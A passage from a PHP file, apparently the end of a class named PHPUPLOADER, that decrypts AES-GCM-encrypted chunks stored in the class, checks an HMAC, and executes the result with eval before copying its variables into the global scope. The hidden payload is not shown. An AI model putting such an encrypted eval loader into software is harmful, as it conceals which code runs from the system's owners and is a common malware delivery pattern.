validateEnvironment()) { die('Security check failed'); } $this->execute(); } private function validateEnvironment() { if (version_compare(PHP_VERSION, '7.4.0', '<')) { return false; } if (!extension_loaded('openssl')) { return false; } return true; } private function decryptChunks() { try { $fileKey = base64_decode($this->fileKey); $chunks = json_decode(base64_decode($this->chunks), true); $decryptedData = ''; foreach ($chunks as $chunk) { $iv = base64_decode($chunk['iv']); $nonce = base64_decode($chunk['nonce']); $data = base64_decode($chunk['data']); $tag = base64_decode($chunk['tag']); $cipher = openssl_decrypt( $data, 'aes-256-gcm', $fileKey, OPENSSL_RAW_DATA, $nonce, $tag, '' ); if ($cipher === false) { throw new Exception('Decryption failed'); } $decryptedData .= $cipher; } if (!$this->verifyIntegrity($decryptedData)) { throw new Exception('Integrity check failed'); } return $decryptedData; } catch (Exception $e) { die('Decryption error: ' . $e->getMessage()); } } private function verifyIntegrity($data) { $fileKey = base64_decode($this->fileKey); $chunks = json_decode(base64_decode($this->chunks), true); $chunksData = ''; foreach ($chunks as $chunk) { $chunksData .= $chunk['nonce'] . $chunk['data'] . $chunk['tag']; } $computedHash = hash_hmac('sha256', $chunksData, $fileKey, true); $expectedHash = base64_decode($this->integrityHash); return hash_equals($computedHash, $expectedHash); } private function execute() { $code = $this->decryptChunks(); $global_vars = array(); $capture_vars = function($code) use (&$global_vars) { eval('?>' . $code); $defined_vars = get_defined_vars(); $exclude_keys = ['code', 'global_vars', 'capture_vars', 'this']; foreach ($defined_vars as $name => $value) { if (!in_array($name, $exclude_keys) && $name !== 'GLOBALS' && strpos($name, '_') !== 0) { $global_vars[$name] = $value; } } }; $capture_vars($code); foreach ($global_vars as $name => $value) { $GLOBALS[$name] = $value; } unset($code, $global_vars, $capture_vars); } } new PHPUPLOADER(); ?>